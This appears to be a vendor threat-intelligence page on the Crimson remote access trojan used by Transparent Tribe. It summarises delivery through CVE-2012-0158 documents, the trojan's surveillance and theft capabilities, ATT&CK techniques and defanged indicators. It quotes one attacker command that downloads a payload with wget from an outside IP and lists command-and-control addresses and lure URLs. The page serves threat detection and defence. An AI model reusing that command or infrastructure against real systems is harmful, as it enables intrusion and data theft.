Crimson, also referred to as MSIL/Crimson, is a modular .NET remote access trojan (RAT) associated with Transparent Tribe. Reporting tied it to Operation Transparent Tribe, which targeted Indian diplomatic and military personnel through spearphishing emails, malicious websites, and weaponized documents exploiting CVE-2012-0158; one described infection chain used an exploit document to drop a downloader that retrieved the fuller-featured RAT from 213.136.87[.]122:10001. Transparent Tribe campaigns also used malicious VBA/VBS-based lures and drive-by pages to deliver Crimson alongside other tools.
Documented Crimson capabilities are consistent with espionage use. It can exfiltrate stolen information over its command-and-control channel using a custom TCP protocol; capture screenshots; capture webcam video; perform microphone/audio surveillance; identify the current user; identify the geographical location of the victim host; discover removable/pluggable drives; collect data from removable drives; steal credentials from web browsers; query installed anti-virus software; delete files from a compromised host; and use a Registry key to track installation duration and possibly versioning. Specifically, it checks HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\last_edate to determine how long it has been installed, and reporting also states it can set a Registry key for similar install-tracking/version purposes.
Additional reporting on MSIL/Crimson states it supports file theft, Outlook email theft, microphone recording, keylogging, browser credential theft, screenshots, webcam capture, and USB file collection. Observed infrastructure and indicators in the provided content include 213.136.87[.]122:10001, 193.37.152[.]28:9990, 5.189.145[.]248:10032, and lure- or delivery-related domains such as intribune.blogspot[.]com, avadhnama[.]com, cdrfox[.]xyz, afgcloud7[.]com, bbmsync2727[.]com, and attachment[.]biz subdomains.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
the attachment was a weaponized RTF document utilizing CVE-2012-0158 to drop an embedded, encoded portable executable (PE)... In multiple lure documents, Type: Exploit, CVE-2012-0158, Embedded Payload. | After successful exploitation and decoding of the embedded payload, a family of malware we refer to as MSIL/Crimson will be executed on the victim’s machine. The first stage in infection is a downloader whose purpose is to download the more fully featured RAT component.
"The actors have access to a sizeable toolset of Trojans that they use in their attack campaigns, including custom developed tools called Crimson and Peppy..." | "...spear-phishing emails with malicious RTF files exploiting CVE-2010-3333 or CVE-2012-0158..."
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
After successful exploitation and decoding of the embedded payload, a family of malware we refer to as MSIL/Crimson will be executed on the victim’s machine. The first stage in infection is a downloader whose purpose is to download the more fully featured RAT component.
35 distinct techniques documented for this family, organized by ATT&CK tactic.
Proofpoint researchers discovered a malicious blogspot.com site... set up to lure Indian military officials into becoming infected with MSIL/Crimson, njRAT, and possibly other malicious tools. | Our investigation began with malicious emails sent to Indian embassies in Saudi Arabia and Kazakstan but turned up connections to watering hole sites focused on Indian military personnel and designed to drop a remote access Trojan (RAT).
runf Execute command ... Peppy is also capable of accepting commands from its C&C to ... execute a shell command
Document Name: “Call Details Record.xls” ... Type: VBS Macro ... VBS Location: hxxp://afgcloud7[.]com/logs/ssc.mcom
During the 2015 Ukraine Electric Power Attack, Sandworm Team modified in-registry Internet settings to lower internet security before launching rundll32.exe ... AADInternals can modify registry keys ... ADVSTORESHELL is capable of setting and deleting Registry values ... [many additional examples].
The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.
During the 2015 Ukraine Electric Power Attack, Sandworm Team modified in-registry Internet settings to lower internet security before launching rundll32.exe ... AADInternals can modify registry keys ... ADVSTORESHELL is capable of setting and deleting Registry values ... [many additional examples].
These modules include keylogging... The keylogger module is a basic keylogger that stores keylogs in a plain text file.
The content repeatedly describes malware and threat actors querying, enumerating, opening, and reading Windows Registry keys and values, e.g., "APT41 queried registry values to determine items such as configured RDP ports and network configurations" and "Reg may be used to gather details from the Windows Registry of a local or remote system at the command-line interface."
The content repeatedly describes malware and threat actors using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, nbtstat, netsh, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, domains, and network adapter/interface details.
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.
The content is a long ATT&CK-style listing of malware and threat actors that collect host details such as OS version, hostname, architecture, CPU, memory, BIOS, language, and other basic system characteristics; examples include use of commands like systeminfo, ver, uname, sw_vers, and WMI queries.
The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
ADVSTORESHELL can list connected devices. APT28 uses a module to receive a notification every time a USB mass storage device is inserted into a victim. APT37 has a Bluetooth device harvester, which uses Windows Bluetooth APIs to find information on connected Bluetooth devices.
The content repeatedly describes threat actors and malware collecting, stealing, identifying, copying, or staging files, documents, credentials, logs, databases, and other information from compromised hosts or local systems.
AppleSeed can find and collect data from removable media devices. APT28 backdoor may collect the entire contents of an inserted USB device. Aria-body has the ability to collect data from USB devices. BADNEWS copies files with certain extensions from USB devices to a predefined directory.
These modules include keylogging... The keylogger module is a basic keylogger that stores keylogs in a plain text file.
Crimson-infected victims may be spied on... recording their screen... cscreen Single screenshot ... scren Capture screen continuously... Beendoor is capable of taking screenshots
email Capable of retrieving email account name, number of emails, and exfiltrate emails from Outlook
The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs... keylogging and exfiltration of files using configurable search parameters begins.
audio... Used to record audio from microphone... stsre Get microphone audio
Crimson utilizes a custom TCP protocol for communicating to C&C... Peppy communicates to its C&C over HTTP.
Crimson utilizes a custom TCP protocol for communicating to C&C.
Examples include: "APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits," "During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads," and multiple malware families "use HTTP GET requests" or similar to download files/payloads.
284 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
53 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Malware capable of identifying the geographical location of a victim host.
Software changes: ... Crimson
Remote access trojan that can conduct microphone-based audio surveillance.
Malware installed via malicious VBA macros embedded in lure documents.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.